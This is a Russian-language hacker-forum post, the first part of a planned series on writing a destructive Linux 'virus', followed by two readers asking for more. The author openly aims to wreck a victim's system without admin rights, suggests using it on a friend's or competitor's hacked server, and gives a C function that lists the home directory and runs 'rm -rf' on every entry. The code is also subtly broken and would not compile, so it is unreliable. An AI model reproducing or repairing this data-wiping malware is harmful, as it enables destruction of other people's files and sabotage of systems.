Вирус-dev от НЕ профи (linux гну) Часть 1.1

DRON85

Участник
Статус
offline
Регистрация
28.05.2018
Сообщения
15
Репутация
19
О linux и о себе.

И так сразу скажу о уровне своей подготовки и вообще кто я такое.
Я не что и не кто и писать реально крутые вирусы которые хакнут пЕнтагон за полторы минуты это не ко мне.
Зато я могу написать простинький вирус и кое что знаю о устройстве системы и си.

Сразу выдам свое мнение о линукс что бы не кто вдруг не подумал что я хейтер о великого опен пупса.
Линукс: гибчайшая ось, она гибка на столько что ты можешь пересобрать ядро исправив там все что хочешь, или вообще сделать свой собственный мего гипер дестрибутив в котором ты будешь флексить безопасностью.


О вирусе.

В первую очередь мы должны понять, что должен делать наш зловред и опредилицо с классификацией.
Вирусы бывают: трояны, лоадеры, стелс вирусы, убиватели (зловреды, паразиты), майнеры, стиллеры, ботнеты, бекдоры, кейлогеры, руткиты и т.д. Больше инфы можно узнать на сайтах антивирусов(лол) ну или коротко в интернетах.
Описание каждого класса найдете тут http://informatika.edusite.ru/lezione8_23.htm

В цикле "уроков" 1.1, 1.2, 1.3 мы попробуем написать вирус зловред который будет ломать нашу ось к хуям собачим.

Зачем это нужно: ну допустим вы хакнули сервак вашего друга и втруг вам захотелось получить в ебальник клавиатурой и сломать все к хуям. И если этот друг будет вашим конкурентом то идея вполне рациональная.

Начнем.
Все тесты проводились на этой OC:
16.04.1-Ubuntu
x86_64 GNU/Linux

Часть 1
И так для начала не плохо бы создать каркас нашего вируса (все исходники будут в приложеном файле)

#include <stdio.h> // Для работы с файлами и не только (советую прочитать документацию)

#include <stdlib.h> // Для роботы с системой
int main()
{
return 0;

}

Часть 2
Определимся с тем какая четкая цель у нашего зловреда.
А цель такова: превисти систему в неработоспособное состояние не получая права админа .
И так почему бы нам не стересть все данные в домашнем репозитории ? Ведь наш школолинуксоид хранил все его важные данные именно там...
И так создаем функцию которая сотворит сей ужос, функция будет понятна даже ребенку.


int pizdec_usr_file()
{
char str[100];
char buf[100];
int c;
int i = 0;
system("cd"); // Залитаем в домашнюю дерикторию
system("ls 1>file"); //Узнаем че за храница в коноре нашего юз ера(веря) и записуем сею инфу в файл


FILE *fp = fopen("file", "r");

while(1){ // бесконечный(нет) цикл который удоляет файлы
if ((c = getc(fp)) == EOF){
return 1;
system("rm file")
}
if ((c = getc(fp)) == '\n'){
sprintf(buf, "rm %s", str);
system(buf);
sprintf(buf, "rm -rf%s", str);
system(buf);
i = 0;
}
if ((c = getc(fp)) !='\n'){
str = c;

}


}
}


В этом уроке я немного затронул создание простейшего вируса. Главная цель урока это анонсировать цикл уроков не более.

Далее нужно поднять права доступа, что бы потом мы могли флексить с файловой системой как захотим, но как это сделать ?
Разберем в статейке 1.2. (ссылку на нее вы найдете в конце(конечно если я её уже написал ;) ))
Там же напишем лоадер (небольшую часть с моего фул лоадера)
В 2.3


P.S
(сразу овечу на вопрос про "почему не на винде" ДА ПОТОМУ ЧТО: у меня ноут с одним 1г озу и Celeron 550 он винду просто не вытянет а вот линукс с WM i3 збс. Хотите винды дайте мне норм пк :))
Доебався до грамматики ? Смотри Онотоле
 

(RE-ANIMATOR)

Участник
Статус
offline
Регистрация
01.04.2019
Сообщения
65
Репутация
48
жду ещё статьи
 

_ZerO_

Местный
Статус
offline
Регистрация
07.04.2019
Сообщения
167
Репутация
86
Я бы ещё почитал, интересная статья.